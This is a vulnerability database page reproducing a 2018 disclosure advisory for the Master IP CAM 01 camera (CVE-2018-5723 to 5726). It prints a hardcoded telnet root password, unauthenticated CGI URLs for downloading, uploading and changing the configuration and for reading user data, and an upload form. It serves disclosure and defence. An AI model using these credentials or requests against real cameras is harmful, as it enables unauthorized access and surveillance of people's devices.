Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDaniele LinguaglossaPACKETSTORM:145935
HistoryJan 17, 2018 - 12:00 a.m.

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

2018-01-1700:00:00
Daniele Linguaglossa
packetstormsecurity.com
56

EPSS

0.204

Percentile

96.4%

JSON
`# Exploit Title: Master IP CAM 01 Multiple Vulnerabilities  
# Date: 17-01-2018  
# Remote: Yes  
# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato  
# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89  
# Vendor: Master IP CAM  
# Version: 3.3.4.2103  
# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726  
  
I DESCRIPTION  
========================================================================  
The Master IP CAM 01 suffers of multiple vulnerabilities:  
  
# [CVE-2018-5723] Hardcoded Password for Root Account  
# [CVE-2018-5724] Unauthenticated Configuration Download and Upload  
# [CVE-2018-5725] Unauthenticated Configuration Change  
# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure  
  
  
II PROOF OF CONCEPT  
========================================================================  
  
## [CVE-2018-5723] Hardcoded Password for Root Account  
  
Is possible to access telnet with the hardcoded credential root:cat1029  
  
  
## [CVE-2018-5724] Unauthenticated Configuration Download and Upload  
  
Download:  
  
http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi  
  
Upload Form:  
  
### Unauthenticated Configuration Upload  
<form name="form6" method="post" enctype="multipart/form-data"  
action="cgi-bin/hi3510/restore.cgi" >  
<input type="file" name="setting_file" >  
<input type="submit" value="restore" >  
</form>  
  
  
## [CVE-2018-5725] Unauthenticated Configuration Change  
  
Change configuration:  
  
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080  
  
List of available commands here:  
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf  
  
  
## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure  
  
Retrieve sensitive information:  
  
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser  
  
  
III REFERENCES  
========================================================================  
http://syrion.me/blog/master-ipcam/  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726  
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf  
  
`

Related

zdt 1
seebug 1
exploitpack 1
exploitdb 1
cve 4
cvelist 4
prion 4
nvd 4
zdt
zdt
Master IP CAM 01 - Multiple Vulnerabilities
2018-01-17 00:00:00
seebug
seebug
Master IP CAM 01 Vulnerabilities
2018-01-22 00:00:00
exploitpack
exploitpack
Master IP CAM 01 - Multiple Vulnerabilities
2018-01-17 00:00:00
exploitdb
exploitdb
Master IP CAM 01 - Multiple Vulnerabilities
2018-01-17 00:00:00
cve
cve
CVE-2018-5726
2018-01-16 22:29:00
CVE-2018-5723
2018-01-16 22:29:00
CVE-2018-5724
2018-01-16 22:29:00
cvelist
cvelist
CVE-2018-5726
2018-01-16 22:00:00
CVE-2018-5723
2018-01-16 22:00:00
CVE-2018-5725
2018-01-16 22:00:00
prion
prion
Default credentials
2018-01-16 22:29:00
Hardcoded credentials
2018-01-16 22:29:00
Default configuration
2018-01-16 22:29:00
nvd
nvd
CVE-2018-5723
2018-01-16 22:29:00
CVE-2018-5726
2018-01-16 22:29:00
CVE-2018-5724
2018-01-16 22:29:00

EPSS

0.204

Percentile

96.4%

JSON
Related for PACKETSTORM:145935
zdt1seebug1exploitpack1exploitdb1cve4cvelist4prion4nvd4